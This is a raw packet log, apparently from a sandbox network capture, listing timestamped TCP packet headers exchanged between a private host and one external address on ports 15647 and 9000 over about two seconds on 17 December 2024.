Dec 17, 2024 08:40:31.588030100 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.588112116 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.591062069 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.591152906 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.594856024 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.594950914 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.615817070 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.618377924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.620443106 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.624485016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.624567986 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.643677950 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.643815994 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.661437035 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.671458960 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.671591043 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.671941042 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.672019958 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.672080994 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.675690889 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.675901890 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.702147961 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.705739975 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.705837011 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.710565090 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.710709095 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.714768887 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.714831114 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.714926004 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.714963913 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.714991093 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.715024948 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.735800028 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.735888958 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.740658045 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.740748882 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.740844965 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.743280888 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.745862961 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.763544083 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.763885975 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.774106026 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.774137020 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.774240017 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.776890993 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.777030945 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.777095079 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.781208038 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.781882048 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.795758963 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.795842886 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.803775072 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.804088116 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.819755077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.819842100 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.819856882 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.821969986 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.823848009 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.830497980 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.835916042 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.836560965 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.858773947 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.860611916 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.860733032 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.861310005 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.861378908 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.861387968 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.861607075 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.865628958 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.865763903 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.883686066 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.883915901 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.892786026 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.892843962 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.892955065 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.896765947 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.897546053 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.897557020 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.897630930 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.915751934 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.919908047 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.927963018 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.931885004 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.932615995 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.932688951 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.936362982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.936376095 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.936419010 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.943545103 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.943923950 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.955806971 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.955868006 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.969063044 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.969135046 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.971733093 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.971796989 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.971815109 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.978595972 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.978657961 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:31.991555929 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:31.991852999 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.003232002 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.003366947 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.003423929 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.012778044 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.012831926 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.014147997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.039624929 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.039870977 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.053184986 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.053339005 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.057888985 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.058052063 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.075556993 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.075612068 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.075923920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.075978041 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.089102030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.089170933 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.091492891 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.091564894 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.094110966 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.094273090 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.094280958 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.103266001 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.103351116 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.103430986 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.123132944 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.123346090 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.124661922 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.124737978 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.124790907 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.142637968 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.142793894 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.142883062 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.161570072 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.173000097 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.173059940 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.179132938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.179178953 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.179251909 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.184071064 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.184140921 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.208925009 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.208985090 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.209604025 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.214190006 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.219892025 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.219949007 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.219985962 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.231904030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.231961966 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.243083000 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.275580883 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.275681019 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.275804996 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.282025099 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.293020964 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.293109894 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.295438051 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.303739071 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.303802967 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.303848982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.328773022 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.329035997 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.332825899 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.332889080 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.332904100 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.334521055 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.335823059 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.351762056 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.351916075 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.351994991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.384057999 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.384152889 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.384248018 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.412925959 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.412995100 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.415256023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.415328979 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.435404062 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.435533047 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.435549021 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.452608109 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.452887058 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.459745884 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.460223913 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.468228102 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.492773056 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.492852926 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.492855072 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.532783031 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.534821987 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.534899950 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.534899950 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.555253029 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.580075026 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.595151901 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.598114014 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.626660109 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.626755953 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.627053022 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.640475988 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.652430058 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.652446032 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.652580976 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.662909985 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.662921906 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.663145065 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.665004015 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.666302919 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.684710979 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.725445986 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.747539997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.747595072 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.747859955 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.787986040 CET	9000	50058	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.788067102 CET	9000	50058	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.788178921 CET	50058	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.790081978 CET	50058	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.804754019 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.844568968 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.844674110 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.876935959 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.879334927 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.909821987 CET	9000	50058	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.910273075 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.911261082 CET	50059	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.932329893 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.960155964 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.981549025 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.981622934 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.981723070 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:32.996737957 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:32.996838093 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.026618004 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.030116081 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.030211926 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.030951023 CET	9000	50059	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.031085968 CET	50059	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.033097029 CET	50059	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.052206993 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.052387953 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.076035023 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.079854012 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.080060959 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.096916914 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.101561069 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.101644993 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.119116068 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.121373892 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.121473074 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.139507055 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.146492958 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.146656036 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.152760983 CET	9000	50059	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.162802935 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.172178984 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.172255993 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.191445112 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.195972919 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.196191072 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.215914011 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.216589928 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.216701984 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.221370935 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.221929073 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.238977909 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.239089012 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.244436979 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.244589090 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.259329081 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.259455919 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.282643080 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.282771111 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.291980982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.292185068 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.311342955 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.311583996 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.316874981 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.316914082 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.317814112 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.335716963 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.336107016 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.341830969 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.342066050 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.352216005 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.352281094 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.352293968 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.364268064 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.364377975 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.381664991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.397470951 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.397525072 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.397728920 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.401216984 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.401278973 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.401408911 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.411997080 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.415923119 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.431129932 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.431909084 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.434309959 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.434423923 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.434501886 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.451092958 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.451584101 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.454317093 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.461899996 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.462855101 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.467423916 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.467473984 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.467567921 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.475133896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.475275993 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.496417999 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.501470089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.501883030 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.517704964 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.517946005 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.518023968 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.518085003 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.527859926 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.531892061 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.540757895 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.540826082 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.540925980 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.556596994 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.558962107 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.559001923 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.559048891 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:33.559050083 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:33.559083939 CET	50034	15647	192.168.2.11	92.255.57.75
